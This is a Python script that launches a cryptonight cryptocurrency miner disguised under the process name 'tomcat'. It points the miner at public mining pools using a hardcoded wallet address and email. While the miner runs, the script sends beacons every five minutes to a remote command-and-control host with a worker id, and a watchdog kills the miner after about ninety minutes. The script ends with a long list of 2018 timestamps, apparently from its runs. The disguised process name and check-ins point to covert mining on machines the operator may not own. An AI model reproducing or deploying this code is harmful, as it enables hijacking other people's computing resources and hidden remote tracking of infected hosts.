import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:14:05.690744
#2018-02-17 16:02:08.089432
#2018-02-17 17:51:01.500499
#2018-02-17 19:38:05.801826
#2018-02-17 21:26:05.437443
#2018-02-17 23:10:08.382230
#2018-02-18 00:58:05.058958
#2018-02-18 02:46:01.932963
#2018-02-18 04:35:06.365373
#2018-02-18 06:26:03.749915
#2018-02-18 08:15:06.053405
#2018-02-18 10:03:04.976433
#2018-02-18 11:49:04.645913
#2018-02-18 13:34:05.904557
#2018-02-18 15:24:06.399080
#2018-02-18 17:12:01.551633
#2018-02-18 19:00:03.680164
#2018-02-18 20:47:06.771140
#2018-02-18 22:34:01.869951
#2018-02-19 00:22:04.608152
#2018-02-19 02:09:05.635459
#2018-02-19 03:56:03.628363
#2018-02-19 05:40:06.235251
#2018-02-19 07:28:07.036129
#2018-02-19 09:18:05.056990
#2018-02-19 11:08:06.845445
#2018-02-19 12:55:09.507345
#2018-02-19 14:44:07.150181
#2018-02-19 16:34:09.210253
#2018-02-19 18:22:04.718650
#2018-02-19 20:08:02.072770
#2018-02-19 21:59:06.935465
#2018-02-19 23:44:12.060806
#2018-02-20 01:32:01.675738
#2018-02-20 03:20:05.015180
#2018-02-20 05:07:07.386615
#2018-02-20 06:51:01.556070
#2018-02-20 08:37:07.339389
#2018-02-20 10:21:08.480740
#2018-02-20 12:06:05.506293
#2018-02-20 13:52:10.042586
#2018-02-20 15:34:01.927260
#2018-02-20 17:19:10.041239
#2018-02-20 19:10:09.901918
#2018-02-20 21:00:09.813929
#2018-02-20 22:45:01.704876
#2018-02-21 00:26:05.737445
#2018-02-21 02:12:05.157367
#2018-02-21 03:58:07.331354
#2018-02-21 05:47:05.882403
#2018-02-21 07:36:04.012379
#2018-02-21 09:21:05.548508
#2018-02-21 11:11:09.381667
#2018-02-21 12:59:12.915675
#2018-02-21 14:47:04.298481
#2018-02-21 16:37:01.245525
#2018-02-21 18:28:04.632818
#2018-02-21 20:15:09.970837
#2018-02-21 22:04:08.252058
#2018-02-21 23:50:03.088735
#2018-02-22 01:40:09.729353
#2018-02-22 03:28:05.721230
#2018-02-22 05:15:08.645349
#2018-02-22 06:59:06.355255
#2018-02-22 08:47:01.523352
#2018-02-22 10:35:01.452684
#2018-02-22 12:20:10.845068
#2018-02-22 14:06:08.186276
#2018-02-22 15:53:12.634784
#2018-02-22 17:41:01.606939
#2018-02-22 19:29:07.003313
#2018-02-22 21:21:06.854743
#2018-02-22 23:07:01.844586
#2018-02-23 00:53:06.395582
#2018-02-23 02:40:06.901910
#2018-02-23 04:27:05.378583
#2018-02-23 06:14:04.861273
#2018-02-23 08:01:06.640655
#2018-02-23 10:19:03.951296
#2018-02-23 12:13:06.671013
#2018-02-23 14:01:04.400402
#2018-02-23 15:54:04.643251
#2018-02-23 17:41:01.416881
#2018-02-23 19:28:01.343361
#2018-02-23 21:13:04.803025
#2018-02-23 22:59:04.444176
#2018-02-24 00:46:05.996363
#2018-02-24 02:41:04.332987
#2018-02-24 04:35:06.840710
#2018-02-24 06:20:06.504736
#2018-02-24 08:07:05.123813
#2018-02-24 09:51:07.391457
#2018-02-24 11:46:01.284510
#2018-02-24 13:36:07.840867
#2018-02-24 15:24:05.546685
#2018-02-24 17:13:01.530101
#2018-02-24 19:04:08.005839
#2018-02-24 20:52:03.664690
#2018-02-24 23:17:01.805391
#2018-02-25 03:25:06.724527
#2018-02-25 07:22:05.661975